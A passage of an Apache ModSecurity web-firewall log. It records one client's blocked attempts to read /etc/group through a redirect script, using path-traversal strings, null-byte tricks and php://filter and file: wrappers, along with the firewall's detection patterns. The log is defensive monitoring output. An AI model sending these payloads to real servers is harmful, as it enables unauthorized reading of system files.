"agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.662291 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.662929 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.663189 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.802106 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmgAAAFU"]
[Tue May 12 05:32:45.802184 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmgAAAFU"]
[Tue May 12 05:32:45.802218 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmgAAAFU"]
[Tue May 12 05:32:45.802274 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmgAAAFU"]
[Tue May 12 05:32:45.802952 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmgAAAFU"]
[Tue May 12 05:32:45.803239 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmgAAAFU"]
[Tue May 12 05:32:45.941948 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:45.942014 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:45.942196 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:45.942239 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:45.942269 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:45.942296 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:45.942354 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:45.943006 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:45.943282 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmwAAAFU"]
[Tue May 12 05:32:46.082270 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignAAAAFU"]
[Tue May 12 05:32:46.082425 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignAAAAFU"]
[Tue May 12 05:32:46.082971 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignAAAAFU"]
[Tue May 12 05:32:46.083218 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignAAAAFU"]
[Tue May 12 05:32:46.221738 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignQAAAFU"]
[Tue May 12 05:32:46.221786 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignQAAAFU"]
[Tue May 12 05:32:46.222013 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignQAAAFU"]
[Tue May 12 05:32:46.222127 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/resource=/etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignQAAAFU"]
[Tue May 12 05:32:46.222654 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignQAAAFU"]
[Tue May 12 05:32:46.222904 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignQAAAFU"]
[Tue May 12 05:32:46.361868 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: file:/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigngAAAFU"]
[Tue May 12 05:32:46.362486 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigngAAAFU"]
[Tue May 12 05:32:46.362740 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezigngAAAFU"]
[Tue May 12 05:32:46.501550 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignwAAAFU"]
[Tue May 12 05:32:46.501619 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignwAAAFU"]
[Tue May 12 05:32:46.501831 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: file:/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignwAAAFU"]
[Tue May 12 05:32:46.502425 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXtr1yOh9TvizezignwAAAFU"]
